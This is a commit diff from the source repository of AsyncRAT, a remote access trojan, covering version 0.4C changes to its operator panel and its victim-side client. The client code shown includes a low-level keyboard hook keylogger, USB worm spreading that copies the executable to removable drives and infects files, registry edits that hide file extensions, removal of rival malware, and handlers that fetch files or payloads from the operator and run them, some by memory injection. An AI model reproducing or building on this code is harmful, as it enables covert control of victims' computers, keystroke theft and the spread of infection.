Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update

Browse Source
This commit is contained in:
NYAN CAT 2019-04-25 14:24:12 -07:00
parent cfae8909d7
commit b7f22693f2
20 changed files with 905 additions and 864 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
AsyncRAT-C#/AsyncRAT-Sharp/Forms/DownloadFile.Designer.cs generated
View File

@ -35,6 +35,7 @@
this.labelsize = new System.Windows.Forms.Label(); this.labelsize = new System.Windows.Forms.Label();
this.label3 = new System.Windows.Forms.Label(); this.label3 = new System.Windows.Forms.Label();
this.labelfile = new System.Windows.Forms.Label(); this.labelfile = new System.Windows.Forms.Label();
this.timer2 = new System.Windows.Forms.Timer(this.components);
this.SuspendLayout(); this.SuspendLayout();
// //
// label1 // label1
@ -78,7 +79,13 @@
this.labelfile.TabIndex = 0; this.labelfile.TabIndex = 0;
this.labelfile.Text = ".."; this.labelfile.Text = "..";
// //
// SocketDownload // timer2
//
this.timer2.Enabled = true;
this.timer2.Interval = 2500;
this.timer2.Tick += new System.EventHandler(this.Timer2_Tick);
//
// DownloadFile
// //
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F); this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
@ -90,7 +97,7 @@
this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon"))); this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
this.MaximizeBox = false; this.MaximizeBox = false;
this.MinimizeBox = false; this.MinimizeBox = false;
this.Name = "SocketDownload"; this.Name = "DownloadFile";
this.Text = "SocketDownload"; this.Text = "SocketDownload";
this.FormClosed += new System.Windows.Forms.FormClosedEventHandler(this.SocketDownload_FormClosed); this.FormClosed += new System.Windows.Forms.FormClosedEventHandler(this.SocketDownload_FormClosed);
this.ResumeLayout(false); this.ResumeLayout(false);
@ -104,5 +111,6 @@
private System.Windows.Forms.Label label3; private System.Windows.Forms.Label label3;
public System.Windows.Forms.Label labelfile; public System.Windows.Forms.Label labelfile;
private System.Windows.Forms.Label label1; private System.Windows.Forms.Label label1;
private System.Windows.Forms.Timer timer2;
} }
} }

11
AsyncRAT-C#/AsyncRAT-Sharp/Forms/DownloadFile.cs
View File

@ -8,6 +8,7 @@ using System.Linq;
using System.Text; using System.Text;
using System.Threading.Tasks; using System.Threading.Tasks;
using System.Windows.Forms; using System.Windows.Forms;
using System.Threading;
namespace AsyncRAT_Sharp.Forms namespace AsyncRAT_Sharp.Forms
{ {
@ -34,10 +35,12 @@ namespace AsyncRAT_Sharp.Forms
private void SocketDownload_FormClosed(object sender, FormClosedEventArgs e) private void SocketDownload_FormClosed(object sender, FormClosedEventArgs e)
{ {
if (C != null) if (C != null) C.Disconnected();
{ }
C.Disconnected();
} private void Timer2_Tick(object sender, EventArgs e)
{
if (!C.ClientSocket.Connected) this.Close();
} }
} }
} }

3
AsyncRAT-C#/AsyncRAT-Sharp/Forms/DownloadFile.resx
View File

@ -120,6 +120,9 @@
<metadata name="timer1.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"> <metadata name="timer1.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>17, 17</value> <value>17, 17</value>
</metadata> </metadata>
<metadata name="timer2.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>131, 17</value>
</metadata>
<assembly alias="System.Drawing" name="System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /> <assembly alias="System.Drawing" name="System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" />
<data name="$this.Icon" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64"> <data name="$this.Icon" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value> <value>

34
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FileManager.Designer.cs generated
View File

@ -40,11 +40,12 @@
this.downloadToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.downloadToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.uPLOADToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.uPLOADToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.dELETEToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.dELETEToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.eXECUTEToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.imageList1 = new System.Windows.Forms.ImageList(this.components); this.imageList1 = new System.Windows.Forms.ImageList(this.components);
this.statusStrip1 = new System.Windows.Forms.StatusStrip(); this.statusStrip1 = new System.Windows.Forms.StatusStrip();
this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel(); this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel();
this.toolStripStatusLabel2 = new System.Windows.Forms.ToolStripStatusLabel(); this.toolStripStatusLabel2 = new System.Windows.Forms.ToolStripStatusLabel();
this.eXECUTEToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.timer1 = new System.Windows.Forms.Timer(this.components);
this.contextMenuStrip1.SuspendLayout(); this.contextMenuStrip1.SuspendLayout();
this.statusStrip1.SuspendLayout(); this.statusStrip1.SuspendLayout();
this.SuspendLayout(); this.SuspendLayout();
@ -83,48 +84,55 @@
this.dELETEToolStripMenuItem, this.dELETEToolStripMenuItem,
this.eXECUTEToolStripMenuItem}); this.eXECUTEToolStripMenuItem});
this.contextMenuStrip1.Name = "contextMenuStrip1"; this.contextMenuStrip1.Name = "contextMenuStrip1";
this.contextMenuStrip1.Size = new System.Drawing.Size(241, 223); this.contextMenuStrip1.Size = new System.Drawing.Size(189, 190);
// //
// backToolStripMenuItem // backToolStripMenuItem
// //
this.backToolStripMenuItem.Name = "backToolStripMenuItem"; this.backToolStripMenuItem.Name = "backToolStripMenuItem";
this.backToolStripMenuItem.Size = new System.Drawing.Size(240, 30); this.backToolStripMenuItem.Size = new System.Drawing.Size(188, 30);
this.backToolStripMenuItem.Text = "BACK"; this.backToolStripMenuItem.Text = "BACK";
this.backToolStripMenuItem.Click += new System.EventHandler(this.backToolStripMenuItem_Click); this.backToolStripMenuItem.Click += new System.EventHandler(this.backToolStripMenuItem_Click);
// //
// toolStripSeparator1 // toolStripSeparator1
// //
this.toolStripSeparator1.Name = "toolStripSeparator1"; this.toolStripSeparator1.Name = "toolStripSeparator1";
this.toolStripSeparator1.Size = new System.Drawing.Size(237, 6); this.toolStripSeparator1.Size = new System.Drawing.Size(185, 6);
// //
// rEFRESHToolStripMenuItem // rEFRESHToolStripMenuItem
// //
this.rEFRESHToolStripMenuItem.Name = "rEFRESHToolStripMenuItem"; this.rEFRESHToolStripMenuItem.Name = "rEFRESHToolStripMenuItem";
this.rEFRESHToolStripMenuItem.Size = new System.Drawing.Size(240, 30); this.rEFRESHToolStripMenuItem.Size = new System.Drawing.Size(188, 30);
this.rEFRESHToolStripMenuItem.Text = "REFRESH"; this.rEFRESHToolStripMenuItem.Text = "REFRESH";
this.rEFRESHToolStripMenuItem.Click += new System.EventHandler(this.rEFRESHToolStripMenuItem_Click); this.rEFRESHToolStripMenuItem.Click += new System.EventHandler(this.rEFRESHToolStripMenuItem_Click);
// //
// downloadToolStripMenuItem // downloadToolStripMenuItem
// //
this.downloadToolStripMenuItem.Name = "downloadToolStripMenuItem"; this.downloadToolStripMenuItem.Name = "downloadToolStripMenuItem";
this.downloadToolStripMenuItem.Size = new System.Drawing.Size(240, 30); this.downloadToolStripMenuItem.Size = new System.Drawing.Size(188, 30);
this.downloadToolStripMenuItem.Text = "DOWNLOAD"; this.downloadToolStripMenuItem.Text = "DOWNLOAD";
this.downloadToolStripMenuItem.Click += new System.EventHandler(this.downloadToolStripMenuItem_Click); this.downloadToolStripMenuItem.Click += new System.EventHandler(this.downloadToolStripMenuItem_Click);
// //
// uPLOADToolStripMenuItem // uPLOADToolStripMenuItem
// //
this.uPLOADToolStripMenuItem.Name = "uPLOADToolStripMenuItem"; this.uPLOADToolStripMenuItem.Name = "uPLOADToolStripMenuItem";
this.uPLOADToolStripMenuItem.Size = new System.Drawing.Size(240, 30); this.uPLOADToolStripMenuItem.Size = new System.Drawing.Size(188, 30);
this.uPLOADToolStripMenuItem.Text = "UPLOAD"; this.uPLOADToolStripMenuItem.Text = "UPLOAD";
this.uPLOADToolStripMenuItem.Click += new System.EventHandler(this.uPLOADToolStripMenuItem_Click); this.uPLOADToolStripMenuItem.Click += new System.EventHandler(this.uPLOADToolStripMenuItem_Click);
// //
// dELETEToolStripMenuItem // dELETEToolStripMenuItem
// //
this.dELETEToolStripMenuItem.Name = "dELETEToolStripMenuItem"; this.dELETEToolStripMenuItem.Name = "dELETEToolStripMenuItem";
this.dELETEToolStripMenuItem.Size = new System.Drawing.Size(240, 30); this.dELETEToolStripMenuItem.Size = new System.Drawing.Size(188, 30);
this.dELETEToolStripMenuItem.Text = "DELETE"; this.dELETEToolStripMenuItem.Text = "DELETE";
this.dELETEToolStripMenuItem.Click += new System.EventHandler(this.dELETEToolStripMenuItem_Click); this.dELETEToolStripMenuItem.Click += new System.EventHandler(this.dELETEToolStripMenuItem_Click);
// //
// eXECUTEToolStripMenuItem
//
this.eXECUTEToolStripMenuItem.Name = "eXECUTEToolStripMenuItem";
this.eXECUTEToolStripMenuItem.Size = new System.Drawing.Size(188, 30);
this.eXECUTEToolStripMenuItem.Text = "EXECUTE";
this.eXECUTEToolStripMenuItem.Click += new System.EventHandler(this.eXECUTEToolStripMenuItem_Click);
//
// imageList1 // imageList1
// //
this.imageList1.ImageStream = ((System.Windows.Forms.ImageListStreamer)(resources.GetObject("imageList1.ImageStream"))); this.imageList1.ImageStream = ((System.Windows.Forms.ImageListStreamer)(resources.GetObject("imageList1.ImageStream")));
@ -157,12 +165,11 @@
this.toolStripStatusLabel2.Size = new System.Drawing.Size(20, 25); this.toolStripStatusLabel2.Size = new System.Drawing.Size(20, 25);
this.toolStripStatusLabel2.Text = ".."; this.toolStripStatusLabel2.Text = "..";
// //
// eXECUTEToolStripMenuItem // timer1
// //
this.eXECUTEToolStripMenuItem.Name = "eXECUTEToolStripMenuItem"; this.timer1.Enabled = true;
this.eXECUTEToolStripMenuItem.Size = new System.Drawing.Size(240, 30); this.timer1.Interval = 1000;
this.eXECUTEToolStripMenuItem.Text = "EXECUTE"; this.timer1.Tick += new System.EventHandler(this.Timer1_Tick);
this.eXECUTEToolStripMenuItem.Click += new System.EventHandler(this.eXECUTEToolStripMenuItem_Click);
// //
// FileManager // FileManager
// //
@ -199,5 +206,6 @@
private System.Windows.Forms.ToolStripMenuItem dELETEToolStripMenuItem; private System.Windows.Forms.ToolStripMenuItem dELETEToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem rEFRESHToolStripMenuItem; private System.Windows.Forms.ToolStripMenuItem rEFRESHToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem eXECUTEToolStripMenuItem; private System.Windows.Forms.ToolStripMenuItem eXECUTEToolStripMenuItem;
private System.Windows.Forms.Timer timer1;
} }
} }

5
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FileManager.cs
View File

@ -181,5 +181,10 @@ namespace AsyncRAT_Sharp.Forms
} }
} }
private void Timer1_Tick(object sender, EventArgs e)
{
if (!C.ClientSocket.Connected) this.Close();
}
} }
} }

1450
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FileManager.resx
View File

File diff suppressed because it is too large Load Diff

BIN
AsyncRAT-C#/AsyncRAT-Sharp/Resources/Stub.exe
View File

Binary file not shown.

2
AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs
View File

@ -14,6 +14,6 @@ namespace AsyncRAT_Sharp
public static string Password { get; set; } public static string Password { get; set; }
public static Aes256 aes256{ get; set; } public static Aes256 aes256{ get; set; }
public static readonly string Version = "AsyncRAT 0.4B"; public static readonly string Version = "AsyncRAT 0.4C";
} }
} }

15
AsyncRAT-C#/AsyncRAT-Sharp/Socket/Clients.cs
View File

@ -32,6 +32,21 @@ namespace AsyncRAT_Sharp.Sockets
return; return;
} }
int count = 0;
foreach (Clients client in Settings.Online)
{
if (client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0] == socket.RemoteEndPoint.ToString().Split(':')[0])
count++;
}
if (count >= 5)
{
Settings.Blocked.Add(socket.RemoteEndPoint.ToString().Split(':')[0]);
HandleLogs.Addmsg($"Client {socket.RemoteEndPoint.ToString().Split(':')[0]} tried to spam, IP blocked", Color.Red);
Disconnected();
return;
}
ClientSocket = socket; ClientSocket = socket;
ClientBuffer = new byte[4]; ClientBuffer = new byte[4];
ClientBufferRecevied = false; ClientBufferRecevied = false;

6
AsyncRAT-C#/AsyncRAT-Sharp/Socket/Listener.cs
View File

@ -15,7 +15,7 @@ namespace AsyncRAT_Sharp.Sockets
{ {
try try
{ {
IPEndPoint IpEndPoint = new IPEndPoint(IPAddress.Any, Convert.ToInt32(port)); IPEndPoint ipEndPoint = new IPEndPoint(IPAddress.Any, Convert.ToInt32(port));
Server = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp) Server = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
{ {
SendBufferSize = 50 * 1024, SendBufferSize = 50 * 1024,
@ -23,7 +23,7 @@ namespace AsyncRAT_Sharp.Sockets
ReceiveTimeout = -1, ReceiveTimeout = -1,
SendTimeout = -1, SendTimeout = -1,
}; };
Server.Bind(IpEndPoint); Server.Bind(ipEndPoint);
Server.Listen(30); Server.Listen(30);
HandleLogs.Addmsg($"Listenning {port}", Color.Green); HandleLogs.Addmsg($"Listenning {port}", Color.Green);
Server.BeginAccept(EndAccept, null); Server.BeginAccept(EndAccept, null);
@ -39,7 +39,7 @@ namespace AsyncRAT_Sharp.Sockets
{ {
try try
{ {
Clients CL = new Clients(Server.EndAccept(ar)); Clients client = new Clients(Server.EndAccept(ar));
} }
finally finally
{ {

14
AsyncRAT-C#/Client/Handle Packet/BotKiller.cs
View File

@ -33,7 +33,7 @@ namespace Client.Handle_Packet
RegistryDelete(@"Software\Microsoft\Windows\CurrentVersion\RunOnce", pName); RegistryDelete(@"Software\Microsoft\Windows\CurrentVersion\RunOnce", pName);
System.Threading.Thread.Sleep(100); System.Threading.Thread.Sleep(100);
File.Delete(pName); File.Delete(pName);
count += 1; count++;
} }
} }
catch { } catch { }
@ -52,7 +52,6 @@ namespace Client.Handle_Packet
if (payload == Process.GetCurrentProcess().MainModule.FileName) return false; if (payload == Process.GetCurrentProcess().MainModule.FileName) return false;
if (payload.Contains(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData))) return true; if (payload.Contains(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData))) return true;
if (payload.Contains(Environment.GetFolderPath(Environment.SpecialFolder.UserProfile))) return true; if (payload.Contains(Environment.GetFolderPath(Environment.SpecialFolder.UserProfile))) return true;
if (payload.Contains(Environment.ExpandEnvironmentVariables("%temp%"))) return true;
if (payload.Contains("wscript.exe")) return true; if (payload.Contains("wscript.exe")) return true;
if (payload.Contains(RuntimeEnvironment.GetRuntimeDirectory())) return true; if (payload.Contains(RuntimeEnvironment.GetRuntimeDirectory())) return true;
return false; return false;
@ -67,11 +66,12 @@ namespace Client.Handle_Packet
{ {
using (RegistryKey key = Registry.CurrentUser.OpenSubKey(regPath, true)) using (RegistryKey key = Registry.CurrentUser.OpenSubKey(regPath, true))
{ {
foreach (string ValueOfName in key.GetValueNames()) if (key != null)
{ foreach (string ValueOfName in key.GetValueNames())
if (key.GetValue(ValueOfName).ToString().Equals(payload)) {
key.DeleteValue(ValueOfName); if (key.GetValue(ValueOfName).ToString().Equals(payload))
} key.DeleteValue(ValueOfName);
}
} }
} }

12
AsyncRAT-C#/Client/Handle Packet/FileManager.cs
View File

@ -101,18 +101,18 @@ namespace Client.Handle_Packet
} }
} }
private void ChunkSend(byte[] Msg, Socket Client) private void ChunkSend(byte[] msg, Socket client)
{ {
try try
{ {
byte[] buffersize = BitConverter.GetBytes(Msg.Length); byte[] buffersize = BitConverter.GetBytes(msg.Length);
Client.Poll(-1, SelectMode.SelectWrite); client.Poll(-1, SelectMode.SelectWrite);
Client.Send(buffersize); client.Send(buffersize);
int chunkSize = 50 * 1024; int chunkSize = 50 * 1024;
byte[] chunk = new byte[chunkSize]; byte[] chunk = new byte[chunkSize];
int SendPackage; int SendPackage;
using (MemoryStream buffereReader = new MemoryStream(Msg)) using (MemoryStream buffereReader = new MemoryStream(msg))
{ {
BinaryReader binaryReader = new BinaryReader(buffereReader); BinaryReader binaryReader = new BinaryReader(buffereReader);
int bytesToRead = (int)buffereReader.Length; int bytesToRead = (int)buffereReader.Length;
@ -120,7 +120,7 @@ namespace Client.Handle_Packet
{ {
chunk = binaryReader.ReadBytes(chunkSize); chunk = binaryReader.ReadBytes(chunkSize);
bytesToRead -= chunkSize; bytesToRead -= chunkSize;
SendPackage = Client.Send(chunk); SendPackage = client.Send(chunk);
} while (bytesToRead > 0); } while (bytesToRead > 0);
binaryReader.Close(); binaryReader.Close();

40
AsyncRAT-C#/Client/Handle Packet/HandlePacket.cs
View File

@ -13,12 +13,12 @@ namespace Client.Handle_Packet
{ {
class HandlePacket class HandlePacket
{ {
public static void Read(object Data) public static void Read(object data)
{ {
try try
{ {
MsgPack unpack_msgpack = new MsgPack(); MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])Data); unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString) switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{ {
case "sendMessage": case "sendMessage":
@ -36,9 +36,9 @@ namespace Client.Handle_Packet
case "sendFile": case "sendFile":
{ {
Received(); Received();
string FullPath = Path.GetTempFileName() + unpack_msgpack.ForcePathObject("Extension").AsString; string fullPath = Path.GetTempFileName() + unpack_msgpack.ForcePathObject("Extension").AsString;
unpack_msgpack.ForcePathObject("File").SaveBytesToFile(FullPath); unpack_msgpack.ForcePathObject("File").SaveBytesToFile(fullPath);
Process.Start(FullPath); Process.Start(fullPath);
if (unpack_msgpack.ForcePathObject("Update").AsString == "true") if (unpack_msgpack.ForcePathObject("Update").AsString == "true")
{ {
Uninstall(); Uninstall();
@ -49,12 +49,12 @@ namespace Client.Handle_Packet
case "sendMemory": case "sendMemory":
{ {
Received(); Received();
byte[] Buffer = unpack_msgpack.ForcePathObject("File").GetAsBytes(); byte[] buffer = unpack_msgpack.ForcePathObject("File").GetAsBytes();
string Injection = unpack_msgpack.ForcePathObject("Inject").AsString; string injection = unpack_msgpack.ForcePathObject("Inject").AsString;
byte[] Plugin = unpack_msgpack.ForcePathObject("Plugin").GetAsBytes(); byte[] plugin = unpack_msgpack.ForcePathObject("Plugin").GetAsBytes();
object[] parameters = new object[] { Buffer, Injection, Plugin }; object[] parameters = new object[] { buffer, injection, plugin };
Thread thread = null; Thread thread = null;
if (Injection.Length == 0) if (injection.Length == 0)
{ {
thread = new Thread(new ParameterizedThreadStart(SendToMemory.Reflection)); thread = new Thread(new ParameterizedThreadStart(SendToMemory.Reflection));
} }
@ -96,15 +96,15 @@ namespace Client.Handle_Packet
{ {
case "false": case "false":
{ {
if (RemoteDesktop.RemoteDesktop_Status == false) return; if (RemoteDesktop.RemoteDesktopStatus == false) return;
RemoteDesktop.RemoteDesktop_Status = false; RemoteDesktop.RemoteDesktopStatus = false;
} }
break; break;
case "true": case "true":
{ {
if (RemoteDesktop.RemoteDesktop_Status == true) return; if (RemoteDesktop.RemoteDesktopStatus == true) return;
RemoteDesktop.RemoteDesktop_Status = true; RemoteDesktop.RemoteDesktopStatus = true;
RemoteDesktop.CaptureAndSend(); RemoteDesktop.CaptureAndSend();
} }
break; break;
@ -151,22 +151,22 @@ namespace Client.Handle_Packet
case "uploadFile": case "uploadFile":
{ {
string FullPath = unpack_msgpack.ForcePathObject("Name").AsString; string fullPath = unpack_msgpack.ForcePathObject("Name").AsString;
unpack_msgpack.ForcePathObject("File").SaveBytesToFile(FullPath); unpack_msgpack.ForcePathObject("File").SaveBytesToFile(fullPath);
} }
break; break;
case "deleteFile": case "deleteFile":
{ {
string FullPath = unpack_msgpack.ForcePathObject("File").AsString; string fullPath = unpack_msgpack.ForcePathObject("File").AsString;
File.Delete(FullPath); File.Delete(fullPath);
} }
break; break;
case "execute": case "execute":
{ {
string FullPath = unpack_msgpack.ForcePathObject("File").AsString; string fullPath = unpack_msgpack.ForcePathObject("File").AsString;
Process.Start(FullPath); Process.Start(fullPath);
} }
break; break;
} }

13
AsyncRAT-C#/Client/Handle Packet/LimeLogger.cs
View File

@ -24,7 +24,7 @@ namespace Client.Handle_Packet
{ {
while (true) while (true)
{ {
Thread.Sleep(1000); Thread.Sleep(500);
if (isON == false) if (isON == false)
{ {
UnhookWindowsHookEx(_hookID); UnhookWindowsHookEx(_hookID);
@ -157,9 +157,8 @@ namespace Client.Handle_Packet
private static string GetActiveWindowTitle() private static string GetActiveWindowTitle()
{ {
const int nChars = 256; const int nChars = 256;
IntPtr handle = IntPtr.Zero;
StringBuilder Buff = new StringBuilder(nChars); StringBuilder Buff = new StringBuilder(nChars);
handle = GetForegroundWindow(); IntPtr handle = GetForegroundWindow();
if (GetWindowText(handle, Buff, nChars) > 0) if (GetWindowText(handle, Buff, nChars) > 0)
{ {
@ -178,8 +177,7 @@ namespace Client.Handle_Packet
{ {
string pName; string pName;
IntPtr hwnd = GetForegroundWindow(); IntPtr hwnd = GetForegroundWindow();
uint pid; GetWindowThreadProcessId(hwnd, out uint pid);
GetWindowThreadProcessId(hwnd, out pid);
Process p = Process.GetProcessById((int)pid); Process p = Process.GetProcessById((int)pid);
pName = Path.GetFileName(p.MainModule.FileName); pName = Path.GetFileName(p.MainModule.FileName);
@ -194,9 +192,8 @@ namespace Client.Handle_Packet
#region "Hooks & Native Methods" #region "Hooks & Native Methods"
private const int WH_KEYBOARD_LL = 13;
private const int WM_KEYDOWN = 0x0100; private const int WM_KEYDOWN = 0x0100;
private static LowLevelKeyboardProc _proc = HookCallback; private static readonly LowLevelKeyboardProc _proc = HookCallback;
private static IntPtr _hookID = IntPtr.Zero; private static IntPtr _hookID = IntPtr.Zero;
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
@ -209,7 +206,7 @@ namespace Client.Handle_Packet
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr GetModuleHandle(string lpModuleName); private static extern IntPtr GetModuleHandle(string lpModuleName);
private static int WHKEYBOARDLL = 13; private static readonly int WHKEYBOARDLL = 13;
private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam); private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);

94
AsyncRAT-C#/Client/Handle Packet/LimeUSB.cs
View File

@ -33,28 +33,28 @@ namespace Client.Handle_Packet
{ {
ExplorerOptions(); ExplorerOptions();
int count = 0; int count = 0;
foreach (DriveInfo USB in DriveInfo.GetDrives()) foreach (DriveInfo usb in DriveInfo.GetDrives())
{ {
try try
{ {
if (USB.DriveType == DriveType.Removable && USB.IsReady) if (usb.DriveType == DriveType.Removable && usb.IsReady)
{ {
count += 1; count += 1;
if (!Directory.Exists(USB.RootDirectory.ToString() + spreadSettings.WorkDirectory)) if (!Directory.Exists(usb.RootDirectory.ToString() + spreadSettings.WorkDirectory))
{ {
Directory.CreateDirectory(USB.RootDirectory.ToString() + spreadSettings.WorkDirectory); Directory.CreateDirectory(usb.RootDirectory.ToString() + spreadSettings.WorkDirectory);
File.SetAttributes(USB.RootDirectory.ToString() + spreadSettings.WorkDirectory, FileAttributes.System | FileAttributes.Hidden); File.SetAttributes(usb.RootDirectory.ToString() + spreadSettings.WorkDirectory, FileAttributes.System | FileAttributes.Hidden);
} }
if (!Directory.Exists((USB.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory))) if (!Directory.Exists((usb.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory)))
Directory.CreateDirectory((USB.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory)); Directory.CreateDirectory((usb.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory));
if (!File.Exists(USB.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.LimeUSBFile)) if (!File.Exists(usb.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.LimeUSBFile))
File.Copy(Application.ExecutablePath, USB.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.LimeUSBFile); File.Copy(Application.ExecutablePath, usb.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.LimeUSBFile);
CreteDirectory(USB.RootDirectory.ToString()); CreteDirectory(usb.RootDirectory.ToString());
InfectFiles(USB.RootDirectory.ToString()); InfectFiles(usb.RootDirectory.ToString());
} }
} }
catch (Exception ex) catch (Exception ex)
@ -76,18 +76,18 @@ namespace Client.Handle_Packet
{ {
try try
{ {
RegistryKey Key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", true); RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", true);
if (Key.GetValue("Hidden") != (object)2) if (key.GetValue("Hidden") != (object)2)
Key.SetValue("Hidden", 2); key.SetValue("Hidden", 2);
if (Key.GetValue("HideFileExt") != (object)1) if (key.GetValue("HideFileExt") != (object)1)
Key.SetValue("HideFileExt", 1); key.SetValue("HideFileExt", 1);
} }
catch { } catch { }
} }
private void InfectFiles(string Path) private void InfectFiles(string path)
{ {
foreach (var file in Directory.GetFiles(Path)) foreach (var file in Directory.GetFiles(path))
{ {
try try
{ {
@ -101,16 +101,16 @@ namespace Client.Handle_Packet
catch { } catch { }
} }
foreach (var directory in Directory.GetDirectories(Path)) foreach (var directory in Directory.GetDirectories(path))
{ {
if (!directory.Contains(spreadSettings.WorkDirectory)) if (!directory.Contains(spreadSettings.WorkDirectory))
InfectFiles(directory); InfectFiles(directory);
} }
} }
private void CreteDirectory(string USB_Directory) private void CreteDirectory(string usbDirectory)
{ {
foreach (var directory in Directory.GetDirectories(USB_Directory)) foreach (var directory in Directory.GetDirectories(usbDirectory))
{ {
try try
{ {
@ -145,41 +145,41 @@ namespace Client.Handle_Packet
{ {
try try
{ {
Icon FileIcon = Icon.ExtractAssociatedIcon(file); Icon fileIcon = Icon.ExtractAssociatedIcon(file);
MultiIcon MultiIcon = new MultiIcon(); MultiIcon multiIcon = new MultiIcon();
SingleIcon SingleIcon = MultiIcon.Add(Path.GetFileName(file)); SingleIcon singleIcon = multiIcon.Add(Path.GetFileName(file));
SingleIcon.CreateFrom(FileIcon.ToBitmap(), IconOutputFormat.Vista); singleIcon.CreateFrom(fileIcon.ToBitmap(), IconOutputFormat.Vista);
SingleIcon.Save(Path.GetPathRoot(file) + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(file.Replace(" ", null)) + ".ico"); singleIcon.Save(Path.GetPathRoot(file) + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(file.Replace(" ", null)) + ".ico");
} }
catch { } catch { }
} }
private void CompileFile(string InfectedFile) private void CompileFile(string infectedFile)
{ {
try try
{ {
